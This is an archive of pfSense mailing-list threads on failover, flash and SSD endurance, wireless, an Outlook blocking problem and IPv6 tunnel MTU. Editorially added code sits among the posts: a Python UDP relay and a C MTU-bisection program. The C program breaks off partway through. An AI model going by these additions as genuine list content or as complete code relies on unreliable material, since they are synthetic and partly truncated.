Re: [pfSense] NIC Failover
Most of the issues with STP are dealt with via 802.1w (rapid spanning tree).

On Sep 11, 2011, at 9:15 AM, Joseph Hardeman wrote:

> Hey Everyone,
>
> So I can do the failover and yes all of the switches are managed. I did see where to set up the LAGG on the pfSense system. I have to deconfigure the two NICs I want to use and then set them up in failover mode, I think. On the switch side, I was using 2 separate switches with rapid spanning tree on their uplink ports and ports to the pfSense system to assist in fast failover. I will give it a shot on Monday and see how it goes.
>
> Thanks.
>
> Joe
>
> -----Original Message-----
> From: list-boun...@lists.pfsense.org [mailto:list-boun...@lists.pfsense.org] On Behalf Of Chris Buechler
> Sent: Sunday, September 11, 2011 1:04 AM
> To: pfSense support and discussion
> Subject: Re: [pfSense] NIC Failover
>
> On Sun, Sep 11, 2011 at 12:46 AM, Austin G. Smith aus...@digitalcompass.com wrote:
>> I have had issues with STP on the firewall in this type of setup previously. Mileage may vary for others..
>
> If you're bridging, yeah that can be a concern depending on your config. Failover lagg without bridging won't cause any issues with STP though. May see switches on occasion that have an issue with a MAC quickly moving from one port to another related to its CAM table, or sometimes with security features on the switch, but that's pretty unusual with typical switch configs. And usually in that scenario you're going to be on two diff switches anyway with failover lagg.

___
List mailing list
List@lists.pfsense.org
http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] Suggestions for embedded hardware
-- 
Jim

On Dec 26, 2011, at 1:38 PM, Chris Buechler c...@pfsense.org wrote:

> On Mon, Dec 26, 2011 at 1:17 PM, Mike Montgomery m...@cityofscottsburg.com wrote:
>> Hello all,
>>
>> I have been running pfSense at home on an old PC now for some time and loving it. I run several m0n0wall Soekris devices at work, but am now looking for a low-end pfSense-capable device that, as of right now, I am only wanting to use for wire captures on my wireless tower sites. Does anyone have suggestions? And do they need hard drives, or could I use flash of some sort?
>>
>> Thanks
>
> ALIX would be the lowest end (cheapest) new hardware available.
> http://store.netgate.com/Desktop-Kits-C82.aspx
>
> They run from CF.
Re: [pfSense] pfSense as an 802.11 access point
On Jan 13, 2012, at 8:24 PM, mdh wrote:

> Hey folks, a few quick questions.
>
> 1. If I want to use pfSense as an 802.11g access point, does this work well?

It works well enough. It's not perfect, and there is no 802.11n support, currently.

> 2. Any specific suggestions on sub-$50 [USD] PCI or USB wireless cards for this purpose? Any to stay away from? External antenna strongly preferred.

My ability to contribute here is quite limited.

> 3. If I wanted to speed up WPA2/AES a bit for a larger number of connections, would a Soekris PCI crypto card be a good choice? Would it be plug-and-play or would I need to change any configs to use it? Would it need any changes to be used for other stuff (like OpenVPN, or other crypto-heavy processes)?

Most of the modern 802.11 chipsets have enough on-board crypto processor to handle AES at full speed.

Jim
Re: [pfSense] pfSense error, maybe hard drive?
On Mar 22, 2012, at 2:08, Dimitri Alexandris d.alexand...@gmail.com wrote:

> On Thu, Mar 22, 2012 at 01:39, Jim Thompson j...@netgate.com wrote:
>> Hmm, No, close, but not really correct. *all* flash will eventually fail if you write to it enough. It's physics.
>
> I do not disagree of course. Fine with theory.

Theory here is reality.

>> SLC NAND flash is typically rated at about 100k cycles, while MLC NAND flash is typically rated at no more than 10k cycles. Via wear-leveling and over-provisioning ('spare blocks') you can increase these numbers, but no native flash device is rated in terms of millions of erase cycles.
>
> You are talking about theory, the memory shell. I talk about the actual flash disks. I believe I mentioned controller stunts to extend the lifetime of the flash. There is a specific mechanism in these industrial flashes, doing exactly this: When it finds an old memory shell refusing to be erased, it re-allocates it (on the fly - transparently) to a healthy / not used sector and marks it bad, much like a hard disk. Read their documentation.

Yes, and I discussed this, but better than this is wear-leveling, which works to avoid the issue, rather than reacting to failure. Combine this with some of the advanced error correction, and you can greatly extend the lifetime of (especially MLC-based) flash drives. Apply the same tech to SLC-based drives, and their lifetime shoots up too. So in the end, SLC will still win for endurance if your application does a lot of writes.

The controller technology (over-provisioning) you describe is at least 2 generations old. It works, but it's nowhere near the state of the art. Most CF cards can do the same thing now. (It's the source of the (harmless) FreeBSD error with SanDisk CF cards, which report actual size, and then reserve some percentage of sectors for this remapping.)

There are 32.5 million seconds or 8760 hours in a year. Writing once an hour rather than once a second seems like an obvious way to reduce writes.
Re: [pfSense] pfSense error, maybe hard drive?
On Mar 22, 2012, at 10:15 AM, Adam Piasecki wrote:

> On 3/22/2012 9:52 AM, Jim Thompson wrote:
>> Yes, and I discussed this, but better than this is wear-leveling, which works to avoid the issue, rather than reacting to failure. Combine this with some of the advanced error correction, and you can greatly extend the lifetime of (especially MLC-based) flash drives.
>
> I have two questions,
>
> 1) Windows has TRIM support for wear-leveling. Does FreeBSD include this? Looking at the wiki page for TRIM (http://en.wikipedia.org/wiki/TRIM) it does not for 8.1, only for low level formatting.

No, but FreeBSD 9.0 (which is to be the base for pfSense 2.1) does support TRIM for ffs.

http://www.freebsd.org/releases/9.0R/relnotes-detailed.html#FS

(answers from previous poster wrt TRIM vs. wear-leveling were also quite good)

> 2) If 8.1 does not support wear-leveling, would it be recommended that we not use SSD for pfSense until it does?

Assuming you're asking about NAND-based SSDs...

> Just trying to figure out if a decent SSD (Not Kingston) would be recommended for pfSense.

Some of the better drive/controller combinations use superior forms of garbage collection, have a larger over-provision of flash blocks, or are used on systems with a larger percentage of sequential writes vs. random writes.

We're evaluating several SSDs here for inclusion on the pfSense systems we sell, but as this is a security appliance, and people tend to depend on it, we're stepping carefully.

(This didn't actually answer your question, but I think Chris has already answered it.)

Jim
Re: [pfSense] Pfsense Ipad / Iphone - Android - Smartphone App
I've considered making this type of thing work with the Redpark serial cables.

-- 
Jim

On Apr 23, 2012, at 9:45, Robert Guerra rgue...@privaterra.org wrote:

> An ideal iOS app would be more a configuration and logging tool for pfSense than one that provides VPN services.
>
> -- 
> R. Guerra
> Phone/Cell: +1 202-905-2081
> Twitter: twitter.com/netfreedom
> Email: rgue...@privaterra.org
>
> On 2012-04-23, at 4:37 PM, Gavin Will wrote:
>> iPhone (or at least iPod touch) can do PPTP and IPsec VPN natively. No need for an app since it uses standards. Works fine for myself the times I need to use it.
>>
>> Gavin
>>
>> From: list-boun...@lists.pfsense.org [mailto:list-boun...@lists.pfsense.org] On Behalf Of justino garcia
>> Sent: 23 April 2012 15:28
>> To: pfSense support and discussion
>> Subject: [pfSense] Pfsense Ipad / Iphone - Android - Smartphone App
>>
>>> Hi Group,
>>>
>>> I noticed Checkpoint, Cisco, Sonicwall, and a bunch of other firewalls have an app for smartphones and tablets. Any idea for a pfSense IPsec/SSL VPN app??? I would like a simple setup for VPN.
>>>
>>> Thanks,
>>> -- 
>>> Justin
>>> IT-TECH
Re: [pfSense] Low(ish) cost pfSense platforms
On Jun 25, 2012, at 6:45 PM, Diego Barrios s...@techsystem.com.br wrote:

> Hi Chris,
>
> I have the same problem here, need a low-power low-cost solution like the excellent Alix board, but with 4 or more 10/100 ports. After weeks of research I discovered that there is nothing like the Alix boards with more ports =/. You can find some good ARM and PPC solutions with a lot of NICs, but not i386, and unfortunately pfSense only runs on the Intel platform. Soekris have some good options, they assemble boards (and cases) like Alix, but with a PCI slot you can plug for example a 4-port PCI NIC into it; the problem is the price... too high for an SMB solution with a really slow 233mhz CPU. They have some better CPUs but too expensive.
>
> http://soekris.com/products/net4801-48-bc-lan1641b.html

It's very difficult to get any margin on Soekris boards.

> The best thing I found was an AAEON (Taiwan) model FWS-2300 with SATA port (so you can run a proxy for example) and 4 GBIT LAN.
>
> http://news.thomasnet.com/fullstory/Network-Appliance-is-designed-for-IDS-IPS-UTM-applications-580284
> http://www.linuxfordevices.com/c/a/News/Aaeon-FWS2300/
>
> This AAEON FWS-2300 costs approximately USD 300

Aaeon also builds some miniPCI 10/100 or 10/100/1000 Ethernet modules. This would require a custom case, but that's approachable. Were I convinced of a market, I'd order several in and take a stab at a prototype case.

That would get you to 4 (3x10/100, 1x10/100 or 1x10/100/1000). But you might be pushing $300 and change to get it all together.

Jim
Re: [pfSense] Encrypt Microwave Link?
On Jun 26, 2012, at 4:54 PM, David Burgess apt@gmail.com wrote:

> That said, it's good practice to keep the beam as narrow as is practical and reduce transmit power accordingly. This reduces the amount of noise you are spreading to the neighbours as well as the probability of others eavesdropping.

This is one of those RF engineering things that doesn't belong on the pfSense list.

That said, in order to make 802.11's CSMA 'work', the side-lobe strength can't be too low. There are a plethora of issues when working with the 802.11 MAC, which strongly assumes omni antennae and relatively high signal strengths. I just can't allow your statement about keeping beamwidth narrow and tx power (more EIRP) low to stand.

With 802.11 devices, if you don't set carrier detect on the other radios in your field of view, as the population of same increases, it is increasingly likely that one of them will decide to transmit while you're attempting to *receive* a packet, ruining your chances of successful reception, due to the changes in the channel vector. Do this often enough, and the whole thing flatlines.

I'm not even going to respond to your "probability of others eavesdropping" assertion on-list. I've been round and round on these issues (and others (*)) on this list (and others), and it's almost never a 'win'. Ten years ago, I thought I understood radio, and especially 802.11. Then I embarked on a journey staffed with real experts who have forgotten more than I'll ever know on these subjects. I'm not even going to lecture on the difference between noise and interference.

This is the pfSense list, and 'Paul' wanted a solution for his *satellite* modems that have an Ethernet hand-off. I don't believe pfSense will do this without running a routed network, which should be fairly straightforward to do. (Just pretend that the two satellite modems are connected to a LAN. A LAN that happens to have a lot of propagation delay, and not quite as much bandwidth as you would assume, but... a LAN nonetheless.) Running a VPN over that is straightforward.

Jim

(*) Often it's the impossibility of using all three 'non-overlapping' channels in 2.4GHz. Sure, the transmit masks don't overlap, but you have to look at the in-channel power from adjacent channel (or even alternate channel) operation. Hint: adjacent channel rejection.
Re: [pfSense] Turning UDP broadcast into a unicast on another interface
Without writing a small program? No, I can't think of a way.

But it's not a big program, assuming you don't care about the packets on the opposite flow.

-- 
Jim

On Oct 2, 2012, at 5:24 PM, Stefan Baur newsgroups.ma...@stefanbaur.de wrote:

> Hi list,
>
> is it possible to have pfSense act upon receiving a UDP broadcast on one specific port on one interface, and turn it into a unicast to a known IP on another interface? And if yes, will I have to set up a second rule so the answer packet reaches its destination on the other interface?
>
> -Stefan
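The "small program" Jim has in mind, written out as an added example (this is not code from the list or from the pfSense project). It receives datagrams on a socket bound to the broadcast port on one interface and resends them as unicast from a socket bound on the other interface; it also hands the target's replies back to whoever last broadcast, which is the "opposite flow" Jim mentions. The bind addresses, port and target below are constructed placeholders; on a real box the egress socket would be bound to the firewall's own address on the second interface so the kernel picks that NIC.

```python
import select
import socket

# Constructed placeholders (not from the list post).
LISTEN_ADDR = ""                 # INADDR_ANY (or the subnet broadcast address) so broadcasts are delivered
LISTEN_PORT = 9999               # the "specific port" the question asks about
EGRESS_ADDR = "0.0.0.0"          # in practice: the firewall's address on the other interface
TARGET = ("192.0.2.10", 9999)    # known unicast destination (RFC 5737 documentation address)


def open_udp(addr, port):
    """Create a UDP socket bound to addr:port (port 0 = let the kernel pick one)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind((addr, port))
    return s


class UdpRelay:
    """Turn datagrams arriving on `inside` into unicasts to `target` sent from
    `outside`, and carry the target's replies back to the last broadcaster."""

    def __init__(self, inside, outside, target):
        self.inside = inside        # socket that receives the broadcast
        self.outside = outside      # socket whose bound address selects the egress interface
        self.target = target        # (ip, port) unicast destination
        self.last_sender = None     # who gets the reply (the "opposite flow")
        self.forwarded = 0
        self.replied = 0

    def forward_one(self, bufsize=65535):
        """Receive one datagram on the inside socket and resend it to target.
        Returns (payload, sender) so a caller can inspect what was relayed."""
        payload, sender = self.inside.recvfrom(bufsize)
        self.last_sender = sender
        self.outside.sendto(payload, self.target)
        self.forwarded += 1
        return payload, sender

    def reply_one(self, bufsize=65535):
        """Receive one datagram on the outside socket and relay it to the most
        recent broadcaster, but only if it really came from the configured
        target. Returns the payload, or None when the datagram was dropped."""
        payload, src = self.outside.recvfrom(bufsize)
        if src != self.target or self.last_sender is None:
            return None             # unexpected source, or nobody to answer: drop it
        self.inside.sendto(payload, self.last_sender)
        self.replied += 1
        return payload

    def serve_forever(self):
        """Service both directions with select(); runs until interrupted."""
        while True:
            ready, _, _ = select.select([self.inside, self.outside], [], [])
            if self.inside in ready:
                self.forward_one()
            if self.outside in ready:
                self.reply_one()


if __name__ == "__main__":
    relay = UdpRelay(open_udp(LISTEN_ADDR, LISTEN_PORT), open_udp(EGRESS_ADDR, 0), TARGET)
    relay.serve_forever()
```

Because the target sees the relay's own address as the source, its answer comes back to the relay's egress socket rather than to the original broadcaster, so the relay, not a second firewall rule, is what delivers it. The source check in `reply_one` keeps an arbitrary host on the second interface from injecting datagrams toward the broadcasting client.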
Re: [pfSense] fast CF cards?
I've got a FireWire 800-based CF gadget, and the SanDisk cards go very fast while running dd to program them with pfSense.

The error isn't, really. The CF reports its entire size, but has kept some sectors in reserve. FreeBSD attempts to access these during boot, and the error results. But nothing bad happened.

Netgate uses Kingston for the 4GB cards, and SanDisk for the 2GB cards.

-- 
Jim

On Nov 6, 2012, at 11:30 AM, Jim Pingle li...@pingle.org wrote:

> On 11/6/2012 2:24 PM, David Burgess wrote:
>> My CF card is getting to be a few years old now, and I really should have a backup ready to go. I really hate slow IO in any machine, and I don't like long drawn-out firmware updates (especially since I'm usually up at 4 am doing them). With that in mind, can anybody recommend a CF card with good write speed and good reliability? I'm not interested in paying $100, as this is an ITX machine and for that money I could just jump to an SSD. My favourite vendor has a good selection of Kingston, but I really don't like that brand for anything other than RAM. If anybody knows of something decent under $40, I welcome your recommendation. Thanks.
>
> I have a Sandisk 200x (30MB/s) 4gb card here that is very speedy. However, it has an annoying quirk with the disk layout that makes FreeBSD spit an error message on every rw mount. Annoying log spam, but it's still speedy. May just be this model, not sure.
>
> Jim
Re: [pfSense] fast CF cards?
On Nov 7, 2012, at 1:59 AM, Chris Bagnall pfse...@lists.minotaur.cc wrote:

> On the other hand, Transcend cards are usually available for less than 10 GBP, which if you're ordering lots of them, is a consideration.

We order a lot of CF (1,000 at a time); we don't buy Transcend or on price alone. We've also never had a Kingston CF fail that I know of.

Jim
Re: [pfSense] How to setup DHCP server so no default gateway specified
On Nov 16, 2012, at 3:04 AM, Will Wagner will_wag...@carallon.com wrote:

> I guess I'll just have to use something else as the DHCP server on that network.

Is DHCP relay an option?
Re: [pfSense] 2.0.2 release now available
On Dec 21, 2012, at 5:52 PM, Chris Bagnall pfse...@lists.minotaur.cc wrote:

> On 21/12/12 11:31 pm, James Caldwell wrote:
>> I'm always a little leery of the 'beta' term. Once you guys stamp it as a release quality build I'll move up to it no problem.
>
> If you want v6 support, you don't get a lot of choice at the moment :-)
>
> FWIW, I've been using 2.1 nightlies in production for the last 6-8 months without any real problems (apart from those minor issues I've mentioned on the list - and both of those only apply to embedded).

We dogfood 2.1 at BSD Perimeter as well. :-)
Re: [pfSense] WRAP
On Jan 5, 2013, at 11:16 AM, David Burgess apt@gmail.com wrote:

> On 2013-01-05 4:59 AM, Eugen Leitl eu...@leitl.org wrote:
>> With the speed of current connections (100+ MBit/s)
>
> lulz. You noticed Hugo is in Canada, eh? To be fair, we can get up to 250 Mbps in a few urban centres, but 6/1 DSL is way more common by my accounting.
>
> That said, I ran pfSense on an Atom D510, but found the webUI too sluggish. I expect responsiveness more than routing throughput would be the upgrade driver for most pfSense users, at least here in the great white north.

We sell more than a few boxes with D510s. The office is even connected by one. The GUI doesn't seem sluggish on these at all. It is a little pokey on an Alix (Geode). Perhaps something else was at issue?

-- 
Jim
Re: [pfSense] mPCIe Recommendations?
Tim,

I'm about to attempt the same thing. Will keep you updated.

Jim

On Feb 11, 2013, at 3:26 PM, Tim Nelson tnel...@rockbochs.com wrote:

> Greetings-
>
> I've just (unsuccessfully) tried setting up an Atheros AR5280 based mPCIe card for use with pfSense 2.0.2. The results were not spectacular. Errors included randomly dropping traffic, dropping carrier, and the infamous scrolling errors 'ath0: stuck beacon...'. So, I'm on a quest for a new card. Suggestions? Can someone tell me a known (guaranteed) working mPCIe interface card that works with pfSense? Use case is simple indoor access point functionality as part of a SOHO firewall.
>
> Thanks!
>
> --Tim
Re: [pfSense] Microsoft Outlook Blocked
iPhone, iPad and Thunderbird may be configured differently than Outlook, especially if Exchange is involved (or the problem is really with authentication.)

See: http://support.microsoft.com/kb/176466

-- 
Jim

On Mar 17, 2013, at 12:06 PM, Gerald Waugh gwa...@frontstreetnetworks.com wrote:

> On 03/17/2013 12:00 PM, master8...@aol.com wrote:
>> On 3/17/2013 12:13 PM, Gerald Waugh wrote:
>>> I have searched the archives, and googled it, but have not found a solution.
>>> Firewall is working great except MS Outlook is being blocked; all other email clients work OK.
>>> filter.log does not give a clue. No blocking shown for the Outlook users' IP.
>>> Sendmail/Dovecot server maillog: Disconnected: Inactivity (no auth attempts):
>>> pfctl -d from cli allows MS Outlook to work OK
>>> pfctl -e from cli stops Outlook
>>> cleared ports to '*' any TCP/UDP * * * * * none Internet to servers
>>>
>>> -- 
>>> Gerald
>>
>> I strongly doubt this is a pfSense problem if other clients work fine. You will need to do a little more troubleshooting here. First thing to confirm my suspicion would be to take pfSense out of the picture and try to connect.
>
> Thanks for the response. With the firewall disabled Outlook will work; with the firewall enabled Outlook will not work, but Thunderbird, iPad, and iPhones do work.
>
> -- 
> Gerald Waugh
> Front Street Networks
> (318) 734-4779
> (318) 401-0428
Re: [pfSense] Microsoft Outlook Blocked
Try hitting Testexchangeconnectivity.com (it's a Microsoft service) or running the Test-OutlookConnectivity tasklet and send the report.

But what you have above (below) shows that you're not reaching a POP(3) server at the given IP address. Any chance you're talking to a different DNS server with the firewall on vs. off?

-- 
Jim

On Mar 17, 2013, at 6:02 PM, Gerald Waugh gwa...@frontstreetnetworks.com wrote:

> On 03/17/2013 05:36 PM, Chris Buechler wrote:
>> On Sun, Mar 17, 2013 at 4:47 PM, Ermal Luçi e...@pfsense.org wrote:
>>> Try enabling on the rule to allow IP options. It might be that the packets are being dropped due to having IP options in them.
>>
>> Outlook shouldn't be using IP options; we'd have had a flood of problem reports if that were the case with any degree of consistency. Without having a packet capture it's hard to say. My guess based on the description is the machine with Outlook has a network misconfiguration of sorts where its traffic isn't hitting the firewall.
>
> Thanks for the response. It is several Outlook IPs that will not work correctly.
> The Outlook client connects but does not complete, and the error on the server is "no auth attempts".
> Error on the client: Task 'u...@domain.com - Receiving' reported error (0x8004210A): 'The operation timed out waiting for a response from the receiving (POP) server. If you continue to receive this message, contact your server administrator or Internet service provider (ISP).'
Re: [pfSense] Open Source WAN Optimization
On Apr 12, 2013, at 12:42 PM, Warren Baker war...@decoy.co.za wrote:

> On Fri, Apr 12, 2013 at 4:50 PM, James Caldwell jamescaldw...@hurricanecs.com wrote:
>> Has anyone had any kind of success running an open source or commercial alternative to Riverbed for WAN optimization? It would be great if some solution like this was available and even better if we could run it inside of pfSense.
>> Cheers.
>
> There is WANProxy http://wanproxy.org/ but never used it so can't comment on its performance or how well it works.

Chris and I have recently discussed adding WANproxy to the mix. Maybe not as part of pfSense, but certainly in the same mold.

Jim
Re: [pfSense] Open Source WAN Optimization
On Apr 12, 2013, at 2:36 PM, James Caldwell jamescaldw...@hurricanecs.com wrote:

> Hi Jim,
>
> That's very interesting. If not directly integrated into pfSense, how do you envision it might take shape?

In general I'm not ready to discuss pfSense futures on list. However, if you think of pfSense as an appliance platform, you will be on the right track.

> What do you think of Glenn Kelley's comment about the very impressive numbers he's been getting using Traffic Squeezer?

Impressive, but it's data dependent, of course.

Jim

> James
>
> From: list-boun...@lists.pfsense.org [mailto:list-boun...@lists.pfsense.org] On Behalf Of Jim Thompson
> Sent: April-12-13 1:32 PM
> To: pfSense support and discussion
> Cc: pfSense support and discussion
> Subject: Re: [pfSense] Open Source WAN Optimization
>
> On Apr 12, 2013, at 12:42 PM, Warren Baker war...@decoy.co.za wrote:
>> On Fri, Apr 12, 2013 at 4:50 PM, James Caldwell jamescaldw...@hurricanecs.com wrote:
>>> Has anyone had any kind of success running an open source or commercial alternative to Riverbed for WAN optimization? It would be great if some solution like this was available and even better if we could run it inside of pfSense.
>>> Cheers.
>>
>> There is WANProxy http://wanproxy.org/ but never used it so can't comment on its performance or how well it works.
>
> Chris and I have recently discussed adding WANproxy to the mix. Maybe not as part of pfSense, but certainly in the same mold.
>
> Jim
Re: [pfSense] Best practice for SSD installs
On Jun 7, 2013, at 7:06 PM, Chris Bagnall pfse...@lists.minotaur.cc wrote:

> Thanks for the response.
>
> On 8/6/13 12:54 am, Jim Thompson wrote:
>> Difficulty? Is this some kind of Brit understatement?
>
> Impossible is a more accurate description of the situation. :-)

I've seen other AMD Geode boards with 4 NICs, but not with 256MB RAM, and we've been seeing issues with <=256MB and 2.1.

>> Load the CD-based installer on an SSD. If you use a USB DOM, you'll want to use the 'embedded' image.
>
> But the full install for an SSD? Or is it better to stick with embedded on those too?

Full install, yes. Embedded is all about reducing writes to the CF.

>>> One other thing I thought I might try is using a USB flash device. I notice from the snapshots there's an image available for these devices, but I can't seem to find much by way of documentation online about the benefits/pitfalls of this approach.
>>
>> That image is an 'installer' image.
>
> Is it possible to 'install' pfSense to a bootable USB flash device at all? Strikes me as a wonderfully elegant solution for updates: just ship a new stick to the remote site and tell someone to plug it in and reboot :-)

Until it falls out.

>> The Realtek NICs might not work in 2.0 series releases. 2.1RC is likely a better option.
>
> Running 2.1 anyway - v6 support very much required :-)
>
> FWIW, I've tested one of these boards this evening just using a spare 2.5" SATA spinning disk I had knocking around here, and both the Realtek and Intel NICs seem to be working in 2.1. I've not put any load through them yet, so I can't attest to performance.
>
> Given most of these systems are going to be handling very low throughput (100Mbps WAN links), is it safer to just disable all the offloading options to be on the safe side?

That's what the rest of the list will advise. They'll all claim that these hardware features don't work. Never mind that they work on other platforms. This gets spun into folklore on the list.

The OpenBSD guys were just discussing how they *made* them work at BSDCan though.

http://www.bsdcan.org/2013/schedule/events/372.en.html

So there is hope that FreeBSD will study same and implement fixes.

Jim
Re: [pfSense] Best practice for SSD installs
On Jun 8, 2013, at 2:24 PM, Michael Schuh michael.sc...@gmail.com wrote:

> i wouldn't only rely on the manufacturer but on the chip type; just saying

If by 'chip' you mean 'controller', I agree.

If by 'chip' you mean the actual flash (memory), then… you're likely mistaken. Intel and Micron are the same thing. (Micron is a second source for Intel flash.) Other manufacturers (Samsung, etc) also make quality flash parts. I suppose there could be some seconds coming out of China, but if you buy the bottom of the price curve, you deserve what you get.

Many people who complain about SSD reliability have either mis-used the technology (e.g. write amplification rears its ugly head) or have purchased the cheapest SSD they can find, and then complain when the part fails.

The upthread advice about Intel SSDs is sound. Now that the Sandforce controller debacle is over, Crucial (who are really a rebrand of Micron (see above)) and Samsung also make good, reliable SSDs.

As a none-too-subtle hint: there are reasons why Netgate has, to date, not shipped SSD (or SSD-like) technology in our pfSense-powered appliances. It's not that we didn't know how, but rather the difference between product and technology demonstration. If you're only concerned with making one, or a dozen, for your own use, the effects of your decision are limited. When you're making 1,000s of units per year, the weight of the decisions carries real monetary consequences.

Also note that phk was discussing flash parts a lot more like 'Compact Flash' or USB flash than SSDs in that document, while this thread has been about using SSDs. Apples != Oranges (Just sayin').

Jim
Re: [pfSense] Best practice for SSD installs
On Jun 9, 2013, at 3:44 PM, Michael Schuh michael.sc...@gmail.com wrote:

> 2013/6/9 Jim Thompson j...@smallworks.com
>> On Jun 8, 2013, at 2:24 PM, Michael Schuh michael.sc...@gmail.com wrote:
>
> Intel actually sells MLC instead of SLC (iirc they had a series with SLC but they are too expensive, not sure if they sell those further)

They do. As you note, they are more expensive per bit than MLC.

> Intel SSDs (actual series afaik MLC) compensate for the different endurance with more memory chips and controller software that round-robins the writes over the entire disk except a reserved space for dying cells.

Same as it ever was. Wear-leveling.

> And yes there are manufacturers with much cleaner production and higher quality of the memory chips.

Did I not say Intel, Crucial/Micron, Samsung?

Jim
Re: [pfSense] IPv6 HE.net tunnel - MTU problem confirmed
On Aug 15, 2013, at 12:13 PM, Adam Hunt voxa...@gmail.com wrote: Thanks for confirming this. I'm glad that I'm not the only one and/or I'm not completely inept. I'll sit down later today and play with the various MTU settings (WAN, HEv6 tunnel, and the setting on the advanced tab of Tunnel Broker's site) and see what, if anything, I can get to work consistently. I don't know what browser you use but I found a simple Chrome extension that has been helpful in determining what protocol (v4/v6) is being using used to connect to any specific site. It's called IPvFoo and is available in the webstore (http://goo.gl/kxKVhx). It adds a little 4 or 6 icon on the right of the URI bar that when clicked on shows what portions of the page were served using what protocol. Again, thanks for confirming this. At certain points I was beginning to doubt myself as things would work on second and break for seemingly no reason the next. --adam On Thu, Aug 15, 2013 at 9:51 AM, Adam Thompson athom...@athompso.net wrote: I'm having the same problem as a recent reporter (whose email I already can't find). I've got a tunnel set up to HE.NET, and experience difficulty browsing to (e.g.) redmine.pfsense.org. Testing shows that the largest ICMP payload I can exchange is 1232 bytes (ping -l 1232 redmine.pfsense.org works, 1233 doesn't). If I stop and reload the page in my browser, everything works fine - I don't know yet if that's because the browser falls back to IPv4 or because the MTU problem suddenly fixes itself. -Adam Thompson athom...@athompso.net Tel: (204) 291-7950 Fax: (204) 489-6515 Hi Adam (and Adam), Seems easy enough to reproduce, assuming that my substitution of '-s' for '-l' is legit. 
jims-mini:~ jim$ ping6 -s 1232 redmine.pfsense.org PING6(1280=40+8+1232 bytes) 2610:160:11:33:84b5:f958:6545:af1c -- 2610:160:11:3::100 1240 bytes from 2610:160:11:3::100, icmp_seq=0 hlim=62 time=1.625 ms ^C --- redmine.pfsense.org ping6 statistics --- 1 packets transmitted, 1 packets received, 0.0% packet loss round-trip min/avg/max/std-dev = 1.625/1.625/1.625/0.000 ms jims-mini:~ jim$ ping6 -s 1233 redmine.pfsense.org PING6(1281=40+8+1233 bytes) 2610:160:11:33:84b5:f958:6545:af1c -- 2610:160:11:3::100 ^C --- redmine.pfsense.org ping6 statistics --- 4 packets transmitted, 0 packets received, 100.0% packet loss Note that I'm … really close. jims-mini:~ jim$ traceroute6 redmine.pfsense.org traceroute6 to redmine.pfsense.org (2610:160:11:3::100) from 2610:160:11:33:84b5:f958:6545:af1c, 64 hops max, 12 byte packets 1 2610:160:11:33::2 1.888 ms 1.861 ms 1.461 ms 2 2610:160:11:12::2 1.984 ms 2.107 ms 2.303 ms 3 2610:160:11:3::100 2.172 ms 2.275 ms 2.250 ms jims-mini:~ jim$ Given same, it almost has to be the pfSense box, since once I'm on redmine, huge packets pass. 
jim@redmine:/home/jim % traceroute6 -n he.net traceroute6 to he.net (2001:470:0:76::2) from 2610:160:11:3::100, 64 hops max, 12 byte packets 1 2610:160:11:3::2 0.381 ms 0.336 ms 0.349 ms 2 2610:160:11::1 4.210 ms 1.249 ms 2.435 ms 3 2610:160:0:11::4 2.556 ms 2.611 ms 0.993 ms 4 2610:160:0:53::17 10.253 ms 10.212 ms 10.408 ms 5 2001:504:0:5::6939:1 12.735 ms 10.145 ms 15.192 ms 6 2001:470:0:258::1 32.502 ms 27.384 ms 27.439 ms 7 2001:470:0:24a::2 62.184 ms 43.638 ms 43.681 ms 8 2001:470:0:16a::1 53.841 ms 46.596 ms 53.421 ms 9 2001:470:0:2f::1 59.776 ms 2001:470:0:18d::1 46.394 ms 46.766 ms 10 2001:470:0:2d::1 55.180 ms 49.954 ms 49.308 ms 11 2001:470:0:76::2 50.513 ms 50.814 ms 50.959 ms jim@redmine:/home/jim % sudo ping6 -s 3500 redmine.pfsense.org PING6(3548=40+8+3500 bytes) 2610:160:11:3::100 -- 2610:160:11:3::100 3508 bytes from 2610:160:11:3::100, icmp_seq=0 hlim=64 time=0.106 ms 3508 bytes from 2610:160:11:3::100, icmp_seq=1 hlim=64 time=0.074 ms 3508 bytes from 2610:160:11:3::100, icmp_seq=2 hlim=64 time=0.076 ms 3508 bytes from 2610:160:11:3::100, icmp_seq=3 hlim=64 time=0.069 ms 3508 bytes from 2610:160:11:3::100, icmp_seq=4 hlim=64 time=0.074 ms ^C --- redmine.pfsense.org ping6 statistics --- 5 packets transmitted, 5 packets received, 0.0% packet loss round-trip min/avg/max/std-dev = 0.069/0.080/0.106/0.013 ms jim@redmine:/home/jim % That said, I'm on redmine with IPvFoo loaded, and it's reporting that I'm hitting the IPv6 site, and I'm not having any issues. We'll look into it and get back to you. jim ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
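The bisection done by hand above (1232 passes, 1233 does not, and 1280 = 40 + 8 + 1232) automated as an added example; this is not code from the thread. The `simulated_probe` path is constructed so the search runs offline; against a real host the probe callback would run `ping6 -c 1 -s <payload> <host>` and return whether it succeeded, with the caveat that FreeBSD and macOS `ping6` fragment oversized probes down to the IPv6 minimum MTU by default (see `-m` in its man page), so check that before trusting a pass. The header sizes are the fixed IPv6 and ICMPv6 echo headers; the MSS figure is what an MSS clamp on the tunnel interface should use.

```c
#include <stdio.h>

/* Added example: automate the ping6 -s bisection from the thread and
 * derive the implied path MTU and a TCP MSS that fits it.  The simulated
 * path is constructed so the search runs offline. */

#define IPV6_HDR      40    /* fixed IPv6 header */
#define ICMPV6_HDR     8    /* ICMPv6 echo request header */
#define TCP_HDR       20    /* TCP header, no options */
#define IPV6_MIN_MTU 1280   /* RFC 8200 minimum link MTU */

typedef int (*probe_fn)(int payload, void *ctx);

int packet_size(int payload) { return IPV6_HDR + ICMPV6_HDR + payload; }
int tcp_mss_for(int mtu)     { return mtu - IPV6_HDR - TCP_HDR; }

/* Constructed stand-in for a path that silently drops anything bigger than
 * its smallest link (no Packet Too Big comes back).  ctx points at the MTU. */
int simulated_probe(int payload, void *ctx)
{
    return packet_size(payload) <= *(int *)ctx;
}

/* Largest payload for which probe() succeeds, or -1 if even `lo` fails.
 * probe must be monotone: if n passes, every smaller size passes. */
int find_largest_payload(probe_fn probe, void *ctx, int lo, int hi)
{
    if (!probe(lo, ctx))
        return -1;
    while (lo < hi) {
        int mid = lo + (hi - lo + 1) / 2;
        if (probe(mid, ctx))
            lo = mid;
        else
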